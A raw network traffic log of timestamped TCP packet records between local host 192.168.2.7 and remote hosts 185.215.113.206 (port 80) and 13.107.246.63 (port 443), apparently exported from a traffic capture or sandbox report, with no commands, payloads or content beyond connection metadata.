Dec 7, 2024 12:59:51.539388895 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.539436102 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.540013075 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.540060043 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.540215015 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.540255070 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.540862083 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.540910959 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.541038036 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.541079044 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.541780949 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.541827917 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.541923046 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.541966915 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.542514086 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.542560101 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.542794943 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.542834997 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.543406010 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.543453932 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.543607950 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.543653011 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.544209957 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.544255972 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.544408083 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.544460058 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.544986010 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.545032024 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.545236111 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.545300961 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.545823097 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.545871019 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.546133041 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.546174049 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.546597958 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.546643019 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.546782970 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.546825886 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.547452927 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.547497988 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.547588110 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.547632933 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.678646088 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.678704023 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.678852081 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.678888083 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.679172039 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.679224014 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.679573059 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.679653883 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.679939985 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.679996014 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.681143999 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.681157112 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.681174994 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.681200027 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.681242943 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.681454897 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.681503057 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.681833982 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.681878090 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.682312965 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.682356119 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.682466030 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.682507038 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.683123112 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.683161020 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.683293104 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.683336973 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.684109926 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.684154987 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.684396982 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.684782982 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.685170889 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.685214996 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.685483932 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.685528994 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.686058998 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.686104059 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.686475992 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.686522007 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.687010050 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.687052965 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.687221050 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.687263012 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.687848091 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.687890053 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.688086033 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.688127041 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.688823938 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.688863993 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.688947916 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.688986063 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.689623117 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.689686060 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.689738035 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.689780951 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.690406084 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.690452099 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.690617085 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.690665007 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.691272020 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.691323042 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.691437006 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.691485882 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.692030907 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.692075014 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.692290068 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.692333937 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.692856073 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.692897081 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.693161964 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.693203926 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.693794966 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.693836927 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.694003105 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.694044113 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.694647074 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.694684029 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.695002079 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.695043087 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.696489096 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.696501017 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.696512938 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.696531057 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.696537018 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.696563959 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.697033882 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.697084904 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.697273016 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.697324038 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.697734118 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.697774887 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.717693090 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.717740059 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.717760086 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.717799902 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.718024969 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.718035936 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.718064070 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.718076944 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.718764067 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.718808889 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.719108105 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.719150066 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.719547987 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.719558954 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.719597101 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.720261097 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.720314026 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.720618963 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.720726967 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.720954895 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.720999956 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.721359015 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.721396923 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.721667051 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.721713066 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.722068071 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.722105980 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.722481012 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.722587109 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.722758055 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.722805977 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.723231077 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.723270893 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.723552942 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.723594904 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.725342035 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.725363970 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.725398064 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.725421906 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.725902081 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:51.725944042 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.813425064 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:51.933295012 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.027559996 CET	443	49809	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:52.028142929 CET	49809	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:52.028167963 CET	443	49809	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:52.028587103 CET	49809	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:52.028593063 CET	443	49809	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:52.256510973 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.256531954 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.256700993 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.256912947 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.257237911 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.257303953 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.257446051 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.257507086 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.257826090 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.257972956 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.258019924 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.258301973 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.258348942 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.258564949 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.258605003 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.258707047 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.258755922 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.259083986 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.259133101 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.259413958 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.259464979 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.259502888 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.259541035 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.259933949 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.259994030 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.260251045 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.260288954 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.307303905 CET	443	49811	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:52.307486057 CET	443	49810	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:52.310389042 CET	49811	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:52.310401917 CET	443	49811	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:52.310831070 CET	49811	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:52.310834885 CET	443	49811	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:52.311172009 CET	49810	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:52.311187983 CET	443	49810	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:52.311522007 CET	49810	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:52.311527014 CET	443	49810	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:52.387342930 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.387602091 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.387725115 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.387870073 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.387995958 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.388050079 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.388441086 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.388482094 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.388767004 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.388900995 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.388943911 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.389333963 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.389373064 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.389621973 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.389662027 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.389727116 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.389764071 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.390088081 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.390122890 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.390480042 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.390518904 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.390641928 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.390993118 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.391033888 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.391669989 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.391733885 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.391776085 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.392056942 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.392530918 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.392571926 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.392579079 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.392625093 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.392961025 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.393394947 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.393434048 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.393640995 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.394090891 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.394128084 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.394320011 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.394361973 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.394747019 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.395087004 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.395123005 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.395344973 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.395858049 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.395899057 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.411761999 CET	443	49812	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:52.415724039 CET	49812	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:52.415747881 CET	443	49812	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:52.416158915 CET	49812	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:52.416163921 CET	443	49812	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:52.448571920 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.448653936 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.448769093 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.463093996 CET	443	49809	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:52.463160992 CET	443	49809	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:52.463239908 CET	49809	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:52.463445902 CET	49809	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:52.463457108 CET	443	49809	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:52.463486910 CET	49809	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:52.463493109 CET	443	49809	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:52.466896057 CET	49814	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:52.466922045 CET	443	49814	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:52.467236042 CET	49814	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:52.467365980 CET	49814	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:52.467376947 CET	443	49814	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:52.519201040 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.519265890 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.519325018 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.519496918 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.519567966 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.519612074 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.519799948 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.519838095 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.520137072 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.520513058 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.520579100 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.520647049 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.520687103 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.521044016 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.521090031 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.521413088 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.521456003 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.521490097 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.521532059 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.521815062 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.521862030 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.522295952 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.522336960 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.522492886 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.522830963 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.522872925 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.523047924 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.523091078 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.523680925 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.523888111 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.523930073 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.524585009 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.524702072 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.524753094 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.525264025 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.525310040 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.525546074 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.525790930 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.525832891 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.526365995 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.526583910 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.526626110 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.527183056 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.527225971 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.527354956 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.527401924 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.528177023 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.528218985 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.528394938 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.528436899 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.528944969 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.529031038 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.529072046 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:52.529691935 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.529835939 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:52.529879093 CET	49788	80	192.168.2.7	185.215.113.206
